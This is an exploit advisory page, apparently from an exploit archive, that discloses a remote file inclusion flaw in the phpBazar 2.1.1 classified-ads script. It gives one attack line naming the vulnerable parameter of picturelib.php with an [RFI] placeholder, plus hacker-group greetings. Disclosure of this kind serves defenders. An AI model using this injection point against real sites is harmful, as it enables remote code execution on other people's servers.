phpBazar 2.1.1 Remote File Inclusion

phpBazar 2.1.1 Remote File Inclusion: Posted Jun 4, 2010; Authored by Sid3 effects; phpBazar version 2.1.1 suffers from a remote file inclusion vulnerability.; tags | exploit, remote, code execution, file inclusion; SHA-256 | 929583e27d1b46b5b61c3306d04478de276377bfaa87c9eaec8a528e29cd83f5; Download | Favorite | View

phpBazar 2.1.1 Remote File Inclusion

# Title: phpBazar V2.1.1 stable rfi Vulnerability 
# Author: Sid3^effects 
# Published: 2010-06-03  
# Verison: 2.1.1 stable
# vendor: SmartISoft
   



        ooooo  .oooooo.  oooooo   oooooo     oooo  

        `888' d8P'  `Y8b  `888.    `888.     .8'  

         888 888           `888.   .8888.   .8'  

         888 888            `888  .8'`888. .8'  

         888 888             `888.8'  `888.8'   

         888 `88b    ooo      `888'    `888'  

        o888o `Y8bood8P'       `8'      `8'     

                                           

--------------------------------------------------------------------------------------  

#####################Sid3^effects aKa HaRi##################################  

#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]  

#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR  

#ShouTZ:kedar,dec0d3r,41.w4r10r       

#Catch us at www.andhrahackers.com or www.teamicw.in  

############################################################################  

    

Description :  

phpBazar is a PHP/MySQL-based higly customizable template-driven classified ad script. Features: Install tool, Multi-languare support, Easy configuration via CSS, User management, Ad pictures stored in MySQL or text file, Ad attachments, Unlimited categories, Structured category display, Picture display, WebMail, Send URL-refer, My ad entries, My ad favorites, Search engine, Ad rating, CatNotify, Expired ads notification, Ad-of-the-Day, Flood protection, Member list/search/details, IP-logging/banning, E-mail and username banning, Dirty and long word filter, Admin ad-approval, Web admin panel, Useronline, and more. Includes guestbook, voting script and Forum & Chat interface. English, German and French languages incl. Also available are picture library, sales, and chat options

############################################################################  

The older versions of phpBazar had many vulnerabilities and the latest verion of phpBazar V2.1.1 stable has got rfi bug 

Xploit : 

   demo url:http://www.phpbazar.com/bazar/picturelib.php?cat=[RFI]
          
############################################################################  

#Sid3^effects

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

phpBazar 2.1.1 Remote File Inclusion

phpBazar 2.1.1 Remote File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpBazar 2.1.1 Remote File Inclusion

Share This

phpBazar 2.1.1 Remote File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems